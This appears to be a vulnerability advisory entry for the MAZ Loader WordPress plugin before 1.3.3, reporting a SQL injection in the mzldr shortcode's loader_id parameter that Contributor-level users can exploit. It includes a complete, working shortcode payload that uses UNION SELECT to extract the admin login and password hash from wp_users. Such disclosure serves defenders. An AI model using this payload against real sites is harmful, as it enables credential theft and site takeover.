MAZ Loader < 1.3.3 - Contributor+ SQL Injection

2021-10-11T00:00:00
ID WPEX-ID:B97AFBE8-C9AE-40A2-81E5-B1D7A6B31831
Type wpexploit
Reporter apple502j
Modified 2021-10-11T07:04:52

Description

The plugin does not validate or escape the loader_id parameter of the mzldr shortcode, which allows users with a role as low as Contributor to perform SQL injection.

                                        
                                            As a user with a role as low as Contributor, put the following shortcode in a page/post and view/preview it to get the login name:password hash pair of the first user in the database (generally admin).

[mzldr loader_id="12345 UNION SELECT 0,1,'SQLi',CONCAT(FROM_BASE64('eyJkYXRhIjp7IjEiOnsiaWQiOjEsInR5cGUiOiJ0ZXh0IiwidGV4dCI6Ig=='),user_login,':',user_pass,FROM_BASE64('Iiwic2l6ZSI6MTAwLCJiYWNrZ3JvdW5kIjoiIiwiY29sb3IiOiIiLCJwYWRkaW5nX3RvcCI6MCwicGFkZGluZ19yaWdodCI6MCwicGFkZGluZ19ib3R0b20iOjAsInBhZGRpbmdfbGVmdCI6MCwicGFkZGluZ19saW5rIjoiYWxsIiwicGFkZGluZ190eXBlIjoicHgiLCJtYXJnaW5fdG9wIjowLCJtYXJnaW5fcmlnaHQiOjAsIm1hcmdpbl9ib3R0b20iOjAsIm1hcmdpbl9sZWZ0IjowLCJtYXJnaW5fbGluayI6ImFsbCIsIm1hcmdpbl90eXBlIjoicHgifX0sInNldHRpbmdzIjp7Im1pbmltdW1fbG9hZGluZ190aW1lIjoyMDAwLCJkdXJhdGlvbiI6MTAwMCwiZGVsYXkiOjAsInNob3dfb25faG9tZXBhZ2UiOiJvZmYifSwiYXBwZWFyYW5jZSI6eyJiYWNrZ3JvdW5kX2NvbG9yIjoiI2RkOTkzMyIsImJhY2tncm91bmQiOiIiLCJiYWNrZ3JvdW5kX2ltYWdlX3R5cGUiOiJjb3ZlciIsImJhY2tncm91bmRfaW1hZ2VfcG9zaXRpb24iOiJjZW50ZXJfY2VudGVyIiwiYmFja2dyb3VuZF9jb2xvcl9vdmVybGF5IjoiIiwiY29udGVudF9wb3NpdGlvbiI6ImNlbnRlciIsIml0ZW1zX3NpZGVfYnlfc2lkZSI6Im9mZiIsImRpc2FibGVfcGFnZV9zY3JvbGwiOiJvbiJ9LCJjdXN0b21fY29kZSI6IiIsInB1Ymxpc2hfc2V0dGluZ3MiOiIifQ==')),1,'2021-08-24 00:00:00',NULL,1 FROM wp_users UNION SELECT *, 1 FROM wp_mzldr_loaders WHERE 0=1"]